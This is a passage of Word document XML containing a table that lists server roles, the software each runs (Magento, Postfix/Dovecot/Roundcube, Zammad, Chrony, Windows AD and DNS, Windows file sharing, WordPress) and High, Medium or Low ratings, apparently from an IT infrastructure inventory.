      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="385C16F8" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AE44CFD" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>www</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="536A6A63" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Magento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34804822" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="0BAB3AD7" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FEA0109" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F36810D" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Postfix + Dovecot + Roundcubemail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39018DD7" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="087EFC03" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42FCF364" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Helpdesk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D122063" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Zammad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B7166BC" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="38BEEF75" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A96BE08" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>ntp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5405028F" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Chrony</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F4016FE" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="1745EB8A" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FF52589" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AADBDEE" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Windows AD, DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065C200B" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="3A9B0EB9" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7069C0AE" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2411D237" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Windows File sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ABA5D53" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="12830E09" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69909351" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Intra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A706889" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Wordpress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75672F00" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="17CF7C19" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48BE2CA3" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
